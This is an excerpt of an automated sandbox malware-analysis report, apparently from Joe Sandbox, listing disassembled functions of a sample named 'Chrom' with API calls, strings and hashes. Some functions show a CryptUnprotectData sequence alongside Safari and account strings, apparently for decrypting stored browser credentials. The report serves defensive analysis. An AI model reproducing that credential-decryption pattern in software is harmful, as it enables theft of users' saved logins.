                                                                                                                                                        • Associated: 00000004.00000002.1693817773.000000000045E000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                        • Associated: 00000004.00000002.1693845131.0000000000474000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_4_2_400000_Chrom.jbxd
                                                                                                                                                        Yara matches
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: Version
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID: 1889659487-0
                                                                                                                                                        • Opcode ID: 7326f150f62c8e493511fbb22f4dc93557bb1aa2f813e00d2fd5eebd9c0dcf9c
                                                                                                                                                        • Instruction ID: 31f7a407b4742d582560ea033e5ca5f76b9ceb554be12180941efba1faa7fce5
                                                                                                                                                        • Opcode Fuzzy Hash: 7326f150f62c8e493511fbb22f4dc93557bb1aa2f813e00d2fd5eebd9c0dcf9c
                                                                                                                                                        • Instruction Fuzzy Hash: 64E0B67591131CCFEB28DB35DB4B3C67AE4A718B46F4004B5C21AD2192D2789A88CA67
                                                                                                                                                        Function 0040298A Relevance: 110.5, APIs: 9, Strings: 54, Instructions: 285COMMON
                                                                                                                                                        Download Yara Rule
                                                                                                                                                        APIs
                                                                                                                                                        • _wcsicmp.MSVCRT ref: 004029B7
                                                                                                                                                        • _wcsicmp.MSVCRT ref: 004029E8
                                                                                                                                                        • _wcsicmp.MSVCRT ref: 00402A16
                                                                                                                                                        • _wcsicmp.MSVCRT ref: 00402A44
                                                                                                                                                          • Part of subcall function 0040B04F: wcslen.MSVCRT ref: 0040B062
                                                                                                                                                          • Part of subcall function 0040B04F: memcpy.MSVCRT(?,?,00000000,00000000,0040D237,00000000,?,?), ref: 0040B081
                                                                                                                                                        • memset.MSVCRT ref: 00402D70
                                                                                                                                                        • memcpy.MSVCRT(?,?,00000011), ref: 00402DAC
                                                                                                                                                          • Part of subcall function 00407687: GetProcAddress.KERNEL32(0045EC00,00000000), ref: 004076B7
                                                                                                                                                          • Part of subcall function 00407687: FreeLibrary.KERNEL32(00000000,00000141,?,-000000FB,?,004016C4,?,00000000,00000000,?), ref: 004076DA
                                                                                                                                                          • Part of subcall function 00407687: CryptUnprotectData.CRYPT32(-000000FB,00000000,-000000FB,00000000,00000000,-000000FB,-000000FB), ref: 004076FC
                                                                                                                                                        • memcpy.MSVCRT(?,?,0000001C,?,?,00000000,?), ref: 00402E10
                                                                                                                                                        • LocalFree.KERNEL32(?,?,?,00000000,?,?,00000000,?), ref: 00402E75
                                                                                                                                                        • FreeLibrary.KERNEL32(00000000,?,?,00000000,?), ref: 00402E86
                                                                                                                                                        Strings
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000004.00000002.1693772779.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                        • Associated: 00000004.00000002.1693760044.0000000000400000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                        • Associated: 00000004.00000002.1693803409.000000000044F000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                        • Associated: 00000004.00000002.1693817773.000000000045A000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                        • Associated: 00000004.00000002.1693817773.000000000045E000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                        • Associated: 00000004.00000002.1693845131.0000000000474000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_4_2_400000_Chrom.jbxd
                                                                                                                                                        Yara matches
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: _wcsicmp$Freememcpy$Library$AddressCryptDataLocalProcUnprotectmemsetwcslen
                                                                                                                                                        • String ID: !$#$$$&$&$'$)$/$0$2$8$=$>$>$@$A$Account$Data$F$H$H$I$K$K$L$O$Path$S$X$\$^$`$a$b$com.apple.Safari$com.apple.WebKit2WebProcess$g$h$n$n$q$server$t$t$t$u$u$w$y$y$z${$}$~
                                                                                                                                                        • API String ID: 2929817778-1134094380
                                                                                                                                                        • Opcode ID: 995f29d439b71307d32f83be2d0feb689db9085f2827bd8da7cec9ab0f4b1b5b
                                                                                                                                                        • Instruction ID: 5c3ec6a99a68f8aa81af4276027bb9dc61f0416e6f69787378e7b5f4b2d81055
                                                                                                                                                        • Opcode Fuzzy Hash: 995f29d439b71307d32f83be2d0feb689db9085f2827bd8da7cec9ab0f4b1b5b
                                                                                                                                                        • Instruction Fuzzy Hash: 07E1E56100C7C18DD332D678884978BBFD45BA7328F084B9EF1E85A2D2D7B99509C76B
                                                                                                                                                        Function 0040CD29 Relevance: 54.5, APIs: 27, Strings: 4, Instructions: 285stringCOMMON
                                                                                                                                                        Download Yara Rule
                                                                                                                                                        APIs
                                                                                                                                                        Strings
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000004.00000002.1693772779.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                        • Associated: 00000004.00000002.1693760044.0000000000400000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                        • Associated: 00000004.00000002.1693803409.000000000044F000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                        • Associated: 00000004.00000002.1693817773.000000000045A000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                        • Associated: 00000004.00000002.1693817773.000000000045E000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                        • Associated: 00000004.00000002.1693845131.0000000000474000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_4_2_400000_Chrom.jbxd
                                                                                                                                                        Yara matches
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: _wcsicmpmemset$_wcsnicmpwcslen$ByteCharMultiWidewcschrwcscpy$memcpystrchrstrlen
                                                                                                                                                        • String ID: :stringdata$ftp://$http://$https://
                                                                                                                                                        • API String ID: 2787044678-1921111777
                                                                                                                                                        • Opcode ID: ec0114e663ce19aff3f90003a8fd63b11b9c22cd63c360598622bef034e99d4e
                                                                                                                                                        • Instruction ID: 31c4756266147e6910c9b81443fc6bcc098cf3ae963dfb44ea8ac31e231b8895
                                                                                                                                                        • Opcode Fuzzy Hash: ec0114e663ce19aff3f90003a8fd63b11b9c22cd63c360598622bef034e99d4e
                                                                                                                                                        • Instruction Fuzzy Hash: E591C571900209AEEF10EF65CC85EAF776CEF41308F11017AFD48A7181EA39ED559BA9
                                                                                                                                                        Function 00415A4F Relevance: 49.3, APIs: 25, Strings: 3, Instructions: 265COMMON
                                                                                                                                                        Download Yara Rule
                                                                                                                                                        APIs
                                                                                                                                                        • GetDlgItem.USER32(?,000003E9), ref: 00415A7C
                                                                                                                                                        • GetDlgItem.USER32(?,000003E8), ref: 00415A88
                                                                                                                                                        • GetWindowLongW.USER32(00000000,000000F0), ref: 00415A97
                                                                                                                                                        • GetWindowLongW.USER32(?,000000F0), ref: 00415AA3
                                                                                                                                                        • GetWindowLongW.USER32(00000000,000000EC), ref: 00415AAC
                                                                                                                                                        • GetWindowLongW.USER32(?,000000EC), ref: 00415AB8
                                                                                                                                                        • GetWindowRect.USER32(00000000,?), ref: 00415ACA
                                                                                                                                                        • GetWindowRect.USER32(?,?), ref: 00415AD5
                                                                                                                                                        • MapWindowPoints.USER32(00000000,?,?,00000002), ref: 00415AE9
                                                                                                                                                        • MapWindowPoints.USER32(00000000,?,?,00000002), ref: 00415AF7
                                                                                                                                                        • GetDC.USER32 ref: 00415B30
                                                                                                                                                        • wcslen.MSVCRT ref: 00415B70
                                                                                                                                                        • GetTextExtentPoint32W.GDI32(?,00000000,00000000,?), ref: 00415B81
                                                                                                                                                        • ReleaseDC.USER32(?,?), ref: 00415BCE
                                                                                                                                                        • _snwprintf.MSVCRT ref: 00415C91
                                                                                                                                                        • SetWindowTextW.USER32(?,?), ref: 00415CA5
                                                                                                                                                        • SetWindowTextW.USER32(?,00000000), ref: 00415CC3
                                                                                                                                                        • GetDlgItem.USER32(?,00000001), ref: 00415CF9
                                                                                                                                                        • GetWindowRect.USER32(00000000,?), ref: 00415D09
                                                                                                                                                        • MapWindowPoints.USER32(00000000,?,?,00000002), ref: 00415D17
                                                                                                                                                        • GetClientRect.USER32(?,?), ref: 00415D2E
                                                                                                                                                        • GetWindowRect.USER32(?,?), ref: 00415D38
                                                                                                                                                        • SetWindowPos.USER32(?,00000000,00000000,00000000,?,?,00000206), ref: 00415D7E
                                                                                                                                                        • GetClientRect.USER32(?,?), ref: 00415D88
                                                                                                                                                        • SetWindowPos.USER32(?,00000000,?,?,?,?,00000204), ref: 00415DC0
                                                                                                                                                        Strings
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000004.00000002.1693772779.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                        • Associated: 00000004.00000002.1693760044.0000000000400000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                        • Associated: 00000004.00000002.1693803409.000000000044F000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                        • Associated: 00000004.00000002.1693817773.000000000045A000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                        • Associated: 00000004.00000002.1693817773.000000000045E000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                        • Associated: 00000004.00000002.1693845131.0000000000474000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_4_2_400000_Chrom.jbxd
                                                                                                                                                        Yara matches
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: Window$Rect$Long$ItemPointsText$Client$ExtentPoint32Release_snwprintfwcslen
                                                                                                                                                        • String ID: %s:$EDIT$STATIC
                                                                                                                                                        • API String ID: 2080319088-3046471546
                                                                                                                                                        • Opcode ID: 73acb0ed32a970b20df8983533c2da65e35bdd152e1489d9eefe2103cdb0831a
                                                                                                                                                        • Instruction ID: 2a77a63511e309727bf0294579c2b04fd4d2a03fba58f863ebfb764bbd101497
                                                                                                                                                        • Opcode Fuzzy Hash: 73acb0ed32a970b20df8983533c2da65e35bdd152e1489d9eefe2103cdb0831a
                                                                                                                                                        • Instruction Fuzzy Hash: ACB1C075108301AFD721DFA8C985E6BBBF9FF88704F004A2DF59582261DB75E9088F56
                                                                                                                                                        Function 00403F80 Relevance: 45.1, APIs: 30, Instructions: 102windowCOMMON
                                                                                                                                                        Download Yara Rule
                                                                                                                                                        APIs
                                                                                                                                                          • Part of subcall function 00410381: memset.MSVCRT ref: 004103C4
                                                                                                                                                          • Part of subcall function 00410381: memset.MSVCRT ref: 004103D9
                                                                                                                                                          • Part of subcall function 00410381: GetWindowsDirectoryW.KERNEL32(?,00000104), ref: 004103EB
                                                                                                                                                          • Part of subcall function 00410381: SHGetFileInfoW.SHELL32(?,00000000,?,000002B4,00004001), ref: 00410409
                                                                                                                                                          • Part of subcall function 00410381: SendMessageW.USER32(?,00001003,00000001,?), ref: 00410446
                                                                                                                                                          • Part of subcall function 00410381: ImageList_Create.COMCTL32(00000020,00000020,00000019,00000001,00000001), ref: 0041045A
                                                                                                                                                          • Part of subcall function 00410381: ImageList_SetImageCount.COMCTL32(00000000,0000000A), ref: 00410465
                                                                                                                                                          • Part of subcall function 00410381: SendMessageW.USER32(?,00001003,00000000,?), ref: 0041047D
                                                                                                                                                          • Part of subcall function 00410381: ImageList_Create.COMCTL32(00000010,00000010,00000019,00000001,00000001), ref: 00410489
                                                                                                                                                          • Part of subcall function 00410381: GetModuleHandleW.KERNEL32(00000000), ref: 00410498
                                                                                                                                                          • Part of subcall function 00410381: LoadImageW.USER32(00000000,00000085,00000000,00000010,00000010,00001000), ref: 004104AA
                                                                                                                                                          • Part of subcall function 00410381: GetModuleHandleW.KERNEL32(00000000), ref: 004104B5
                                                                                                                                                          • Part of subcall function 00410381: LoadImageW.USER32(00000000,00000086,00000000,00000010,00000010,00001000), ref: 004104C7
                                                                                                                                                          • Part of subcall function 00410381: ImageList_SetImageCount.COMCTL32(?,00000000), ref: 004104D8
                                                                                                                                                          • Part of subcall function 00410381: GetSysColor.USER32(0000000F), ref: 004104E0
                                                                                                                                                        • GetModuleHandleW.KERNEL32(00000000), ref: 00403F95
                                                                                                                                                        • LoadIconW.USER32(00000000,00000072), ref: 00403FA0
                                                                                                                                                        • ImageList_ReplaceIcon.COMCTL32(?,00000000,00000000), ref: 00403FB1
                                                                                                                                                        • GetModuleHandleW.KERNEL32(00000000), ref: 00403FB5
                                                                                                                                                        • LoadIconW.USER32(00000000,00000074), ref: 00403FBA
                                                                                                                                                        • ImageList_ReplaceIcon.COMCTL32(?,00000001,00000000), ref: 00403FC5
                                                                                                                                                        • GetModuleHandleW.KERNEL32(00000000), ref: 00403FC9
                                                                                                                                                        • LoadIconW.USER32(00000000,00000073), ref: 00403FCE
                                                                                                                                                        • ImageList_ReplaceIcon.COMCTL32(?,00000002,00000000), ref: 00403FD9
                                                                                                                                                        • GetModuleHandleW.KERNEL32(00000000), ref: 00403FDD
                                                                                                                                                        • LoadIconW.USER32(00000000,00000075), ref: 00403FE2
                                                                                                                                                        • ImageList_ReplaceIcon.COMCTL32(?,00000003,00000000), ref: 00403FED
                                                                                                                                                        • GetModuleHandleW.KERNEL32(00000000), ref: 00403FF1
                                                                                                                                                        • LoadIconW.USER32(00000000,0000006F), ref: 00403FF6
                                                                                                                                                        • ImageList_ReplaceIcon.COMCTL32(?,00000004,00000000), ref: 00404001
                                                                                                                                                        • GetModuleHandleW.KERNEL32(00000000), ref: 00404005
                                                                                                                                                        • LoadIconW.USER32(00000000,00000076), ref: 0040400A
                                                                                                                                                        • ImageList_ReplaceIcon.COMCTL32(?,00000005,00000000), ref: 00404015
                                                                                                                                                        • GetModuleHandleW.KERNEL32(00000000), ref: 00404019
                                                                                                                                                        • LoadIconW.USER32(00000000,00000077), ref: 0040401E
                                                                                                                                                        • ImageList_ReplaceIcon.COMCTL32(?,00000006,00000000), ref: 00404029
                                                                                                                                                        • GetModuleHandleW.KERNEL32(00000000), ref: 0040402D
                                                                                                                                                        • LoadIconW.USER32(00000000,00000070), ref: 00404032
                                                                                                                                                        • ImageList_ReplaceIcon.COMCTL32(?,00000007,00000000), ref: 0040403D
                                                                                                                                                        • GetModuleHandleW.KERNEL32(00000000), ref: 00404041
                                                                                                                                                        • LoadIconW.USER32(00000000,00000078), ref: 00404046
                                                                                                                                                        • ImageList_ReplaceIcon.COMCTL32(?,00000008,00000000), ref: 00404051
                                                                                                                                                        • GetModuleHandleW.KERNEL32(00000000), ref: 00404055
                                                                                                                                                        • LoadIconW.USER32(00000000,00000079), ref: 0040405A
                                                                                                                                                        • ImageList_ReplaceIcon.COMCTL32(?,00000009,00000000), ref: 00404065
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000004.00000002.1693772779.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                        • Associated: 00000004.00000002.1693760044.0000000000400000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                        • Associated: 00000004.00000002.1693803409.000000000044F000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                        • Associated: 00000004.00000002.1693817773.000000000045A000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                        • Associated: 00000004.00000002.1693817773.000000000045E000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                        • Associated: 00000004.00000002.1693845131.0000000000474000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_4_2_400000_Chrom.jbxd
                                                                                                                                                        Yara matches
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: Icon$Image$List_$HandleLoadModule$Replace$CountCreateMessageSendmemset$ColorDirectoryFileInfoWindows
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID: 264706568-0
                                                                                                                                                        • Opcode ID: 9f26e654fdeb6fce359c75dfd32fafc8b0d8d0789e32bb966788a2aece390ca3
                                                                                                                                                        • Instruction ID: fa83cebbb95bcb8725bd261a30b51bef8f87386f5cc1911db7833ce7996ea14a
                                                                                                                                                        • Opcode Fuzzy Hash: 9f26e654fdeb6fce359c75dfd32fafc8b0d8d0789e32bb966788a2aece390ca3
                                                                                                                                                        • Instruction Fuzzy Hash: 56210EA0A897087AF63137B2DC4BF6B7A5EDF81B45F224414F74C990E1C9E6AC104928
                                                                                                                                                        Function 00403F83 Relevance: 45.1, APIs: 30, Instructions: 102windowCOMMON
                                                                                                                                                        Download Yara Rule
                                                                                                                                                        APIs
                                                                                                                                                          • Part of subcall function 00410381: memset.MSVCRT ref: 004103C4
                                                                                                                                                          • Part of subcall function 00410381: memset.MSVCRT ref: 004103D9
                                                                                                                                                          • Part of subcall function 00410381: GetWindowsDirectoryW.KERNEL32(?,00000104), ref: 004103EB
                                                                                                                                                          • Part of subcall function 00410381: SHGetFileInfoW.SHELL32(?,00000000,?,000002B4,00004001), ref: 00410409
                                                                                                                                                          • Part of subcall function 00410381: SendMessageW.USER32(?,00001003,00000001,?), ref: 00410446
                                                                                                                                                          • Part of subcall function 00410381: ImageList_Create.COMCTL32(00000020,00000020,00000019,00000001,00000001), ref: 0041045A
                                                                                                                                                          • Part of subcall function 00410381: ImageList_SetImageCount.COMCTL32(00000000,0000000A), ref: 00410465
                                                                                                                                                          • Part of subcall function 00410381: SendMessageW.USER32(?,00001003,00000000,?), ref: 0041047D
                                                                                                                                                          • Part of subcall function 00410381: ImageList_Create.COMCTL32(00000010,00000010,00000019,00000001,00000001), ref: 00410489
                                                                                                                                                          • Part of subcall function 00410381: GetModuleHandleW.KERNEL32(00000000), ref: 00410498
                                                                                                                                                          • Part of subcall function 00410381: LoadImageW.USER32(00000000,00000085,00000000,00000010,00000010,00001000), ref: 004104AA
                                                                                                                                                          • Part of subcall function 00410381: GetModuleHandleW.KERNEL32(00000000), ref: 004104B5
                                                                                                                                                          • Part of subcall function 00410381: LoadImageW.USER32(00000000,00000086,00000000,00000010,00000010,00001000), ref: 004104C7
                                                                                                                                                          • Part of subcall function 00410381: ImageList_SetImageCount.COMCTL32(?,00000000), ref: 004104D8
                                                                                                                                                          • Part of subcall function 00410381: GetSysColor.USER32(0000000F), ref: 004104E0
                                                                                                                                                        • GetModuleHandleW.KERNEL32(00000000), ref: 00403F95
                                                                                                                                                        • LoadIconW.USER32(00000000,00000072), ref: 00403FA0
                                                                                                                                                        • ImageList_ReplaceIcon.COMCTL32(?,00000000,00000000), ref: 00403FB1
                                                                                                                                                        • GetModuleHandleW.KERNEL32(00000000), ref: 00403FB5
                                                                                                                                                        • LoadIconW.USER32(00000000,00000074), ref: 00403FBA
                                                                                                                                                        • ImageList_ReplaceIcon.COMCTL32(?,00000001,00000000), ref: 00403FC5
                                                                                                                                                        • GetModuleHandleW.KERNEL32(00000000), ref: 00403FC9
                                                                                                                                                        • LoadIconW.USER32(00000000,00000073), ref: 00403FCE
                                                                                                                                                        • ImageList_ReplaceIcon.COMCTL32(?,00000002,00000000), ref: 00403FD9
                                                                                                                                                        • GetModuleHandleW.KERNEL32(00000000), ref: 00403FDD
                                                                                                                                                        • LoadIconW.USER32(00000000,00000075), ref: 00403FE2
                                                                                                                                                        • ImageList_ReplaceIcon.COMCTL32(?,00000003,00000000), ref: 00403FED
                                                                                                                                                        • GetModuleHandleW.KERNEL32(00000000), ref: 00403FF1
                                                                                                                                                        • LoadIconW.USER32(00000000,0000006F), ref: 00403FF6
                                                                                                                                                        • ImageList_ReplaceIcon.COMCTL32(?,00000004,00000000), ref: 00404001
                                                                                                                                                        • GetModuleHandleW.KERNEL32(00000000), ref: 00404005
                                                                                                                                                        • LoadIconW.USER32(00000000,00000076), ref: 0040400A
                                                                                                                                                        • ImageList_ReplaceIcon.COMCTL32(?,00000005,00000000), ref: 00404015
                                                                                                                                                        • GetModuleHandleW.KERNEL32(00000000), ref: 00404019
                                                                                                                                                        • LoadIconW.USER32(00000000,00000077), ref: 0040401E
                                                                                                                                                        • ImageList_ReplaceIcon.COMCTL32(?,00000006,00000000), ref: 00404029
                                                                                                                                                        • GetModuleHandleW.KERNEL32(00000000), ref: 0040402D
                                                                                                                                                        • LoadIconW.USER32(00000000,00000070), ref: 00404032
                                                                                                                                                        • ImageList_ReplaceIcon.COMCTL32(?,00000007,00000000), ref: 0040403D
                                                                                                                                                        • GetModuleHandleW.KERNEL32(00000000), ref: 00404041
                                                                                                                                                        • LoadIconW.USER32(00000000,00000078), ref: 00404046
                                                                                                                                                        • ImageList_ReplaceIcon.COMCTL32(?,00000008,00000000), ref: 00404051
                                                                                                                                                        • GetModuleHandleW.KERNEL32(00000000), ref: 00404055
                                                                                                                                                        • LoadIconW.USER32(00000000,00000079), ref: 0040405A
                                                                                                                                                        • ImageList_ReplaceIcon.COMCTL32(?,00000009,00000000), ref: 00404065
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000004.00000002.1693772779.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                        • Associated: 00000004.00000002.1693760044.0000000000400000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                        • Associated: 00000004.00000002.1693803409.000000000044F000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                        • Associated: 00000004.00000002.1693817773.000000000045A000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                        • Associated: 00000004.00000002.1693817773.000000000045E000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                        • Associated: 00000004.00000002.1693845131.0000000000474000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_4_2_400000_Chrom.jbxd
                                                                                                                                                        Yara matches
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: Icon$Image$List_$HandleLoadModule$Replace$CountCreateMessageSendmemset$ColorDirectoryFileInfoWindows
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID: 264706568-0
                                                                                                                                                        • Opcode ID: 7a8e7a753c4a6969c8ebad43a6ff4298becb11f1dffce4c04823a78b46f89c4a
                                                                                                                                                        • Instruction ID: 4987a5fc14cceb3ec057973e66b70c09839ea495ac49043ce4cc72b72b9a55f5
                                                                                                                                                        • Opcode Fuzzy Hash: 7a8e7a753c4a6969c8ebad43a6ff4298becb11f1dffce4c04823a78b46f89c4a
                                                                                                                                                        • Instruction Fuzzy Hash: 46211DA0B857087AF63037B2DC4BF7B7A5EDF81B89F224410F74C990E0C9E6AC104928
                                                                                                                                                        Function 00413704 Relevance: 42.2, APIs: 22, Strings: 2, Instructions: 214windowCOMMON
                                                                                                                                                        Download Yara Rule
                                                                                                                                                        APIs
                                                                                                                                                        • EndDialog.USER32(?,?), ref: 00413749
                                                                                                                                                        • GetDlgItem.USER32(?,000003EA), ref: 00413761
                                                                                                                                                        • SendMessageW.USER32(00000000,000000B1,00000000,0000FFFF), ref: 0041377F
                                                                                                                                                        • SendMessageW.USER32(?,00000301,00000000,00000000), ref: 0041378B
                                                                                                                                                        • SendMessageW.USER32(?,000000B1,00000000,00000000), ref: 00413793
                                                                                                                                                        • memset.MSVCRT ref: 004137BA
                                                                                                                                                        • memset.MSVCRT ref: 004137DC
                                                                                                                                                        • memset.MSVCRT ref: 004137F5
                                                                                                                                                        • memset.MSVCRT ref: 00413809
                                                                                                                                                        • memset.MSVCRT ref: 00413823
                                                                                                                                                        • memset.MSVCRT ref: 00413838
                                                                                                                                                        • GetCurrentProcess.KERNEL32 ref: 00413840
                                                                                                                                                        • ReadProcessMemory.KERNEL32(00000000,?,00000080,00000000), ref: 00413863
                                                                                                                                                        • ReadProcessMemory.KERNEL32(?,?,00000080,00000000), ref: 00413895
                                                                                                                                                        • memset.MSVCRT ref: 004138E8
                                                                                                                                                        • GetCurrentProcessId.KERNEL32 ref: 004138F6
                                                                                                                                                        • memcpy.MSVCRT(?,0045BA90,0000021C), ref: 00413924
                                                                                                                                                        • wcscpy.MSVCRT ref: 00413947
                                                                                                                                                        • _snwprintf.MSVCRT ref: 004139B6
                                                                                                                                                        • SetDlgItemTextW.USER32(?,000003EA,?), ref: 004139CE
                                                                                                                                                        • GetDlgItem.USER32(?,000003EA), ref: 004139D8
                                                                                                                                                        • SetFocus.USER32(00000000), ref: 004139DF
                                                                                                                                                        Strings
                                                                                                                                                        • {Unknown}, xrefs: 004137CE
                                                                                                                                                        • Exception %8.8X at address %8.8X in module %sRegisters: EAX=%8.8X EBX=%8.8X ECX=%8.8X EDX=%8.8XESI=%8.8X EDI=%8.8X EBP=%8.8X, xrefs: 004139AB
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000004.00000002.1693772779.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                        • Associated: 00000004.00000002.1693760044.0000000000400000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                        • Associated: 00000004.00000002.1693803409.000000000044F000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                        • Associated: 00000004.00000002.1693817773.000000000045A000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                        • Associated: 00000004.00000002.1693817773.000000000045E000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                        • Associated: 00000004.00000002.1693845131.0000000000474000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_4_2_400000_Chrom.jbxd
                                                                                                                                                        Yara matches
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: memset$Process$ItemMessageSend$CurrentMemoryRead$DialogFocusText_snwprintfmemcpywcscpy
                                                                                                                                                        • String ID: Exception %8.8X at address %8.8X in module %sRegisters: EAX=%8.8X EBX=%8.8X ECX=%8.8X EDX=%8.8XESI=%8.8X EDI=%8.8X EBP=%8.8X${Unknown}
                                                                                                                                                        • API String ID: 4111938811-1819279800
                                                                                                                                                        • Opcode ID: 96155596f3279f9d03c0a9243ad5968801c4fe39fa66a488338b1dd2f38d3b4c
                                                                                                                                                        • Instruction ID: f28911e6e9c8f7c9bcffcad48f5b4909217dcd52314a7c8ddb419c581ced49a2
                                                                                                                                                        • Opcode Fuzzy Hash: 96155596f3279f9d03c0a9243ad5968801c4fe39fa66a488338b1dd2f38d3b4c
                                                                                                                                                        • Instruction Fuzzy Hash: 087180B280121DFEEB11AF51DC45EEB776CEB08355F0440BAF508A2151EB799E848FA9
                                                                                                                                                        Function 004017B0 Relevance: 39.2, APIs: 26, Instructions: 185COMMON
                                                                                                                                                        Download Yara Rule
                                                                                                                                                        APIs
                                                                                                                                                        • GetDlgItem.USER32(?,000003EC), ref: 00401808
                                                                                                                                                        • ChildWindowFromPoint.USER32(?,?,?), ref: 0040181A
                                                                                                                                                        • GetDlgItem.USER32(?,000003EE), ref: 00401850
                                                                                                                                                        • ChildWindowFromPoint.USER32(?,?,?), ref: 0040185D
                                                                                                                                                        • GetDlgItem.USER32(?,000003EC), ref: 0040188B
                                                                                                                                                        • ChildWindowFromPoint.USER32(?,?,?), ref: 0040189D
                                                                                                                                                        • GetModuleHandleW.KERNEL32(00000000,?,?), ref: 004018A6
                                                                                                                                                        • LoadCursorW.USER32(00000000,00000067), ref: 004018AF
                                                                                                                                                        • SetCursor.USER32(00000000,?,?), ref: 004018B6
                                                                                                                                                        • GetDlgItem.USER32(?,000003EE), ref: 004018D7
                                                                                                                                                        • ChildWindowFromPoint.USER32(?,?,?), ref: 004018E4
                                                                                                                                                        • GetDlgItem.USER32(?,000003EC), ref: 004018FE
                                                                                                                                                        • SetBkMode.GDI32(?,00000001), ref: 0040190A
                                                                                                                                                        • SetTextColor.GDI32(?,00C00000), ref: 00401918
                                                                                                                                                        • GetSysColorBrush.USER32(0000000F), ref: 00401920
                                                                                                                                                        • GetDlgItem.USER32(?,000003EE), ref: 00401941
                                                                                                                                                        • EndDialog.USER32(?,?), ref: 00401976
                                                                                                                                                        • DeleteObject.GDI32(?), ref: 00401982
                                                                                                                                                        • GetDlgItem.USER32(?,000003ED), ref: 004019A7
                                                                                                                                                        • ShowWindow.USER32(00000000), ref: 004019B0
                                                                                                                                                        • GetDlgItem.USER32(?,000003EE), ref: 004019BC
                                                                                                                                                        • ShowWindow.USER32(00000000), ref: 004019BF
                                                                                                                                                        • SetDlgItemTextW.USER32(?,000003EE,0045E778), ref: 004019D0
                                                                                                                                                        • SetWindowTextW.USER32(?,00000000), ref: 004019E2
                                                                                                                                                        • SetDlgItemTextW.USER32(?,000003EA,?), ref: 004019FA
                                                                                                                                                        • SetDlgItemTextW.USER32(?,000003EC,?), ref: 00401A0B
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000004.00000002.1693772779.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                        • Associated: 00000004.00000002.1693760044.0000000000400000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                        • Associated: 00000004.00000002.1693803409.000000000044F000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                        • Associated: 00000004.00000002.1693817773.000000000045A000.00000004.00000001.01000000.0000000C.sdmpDownload File
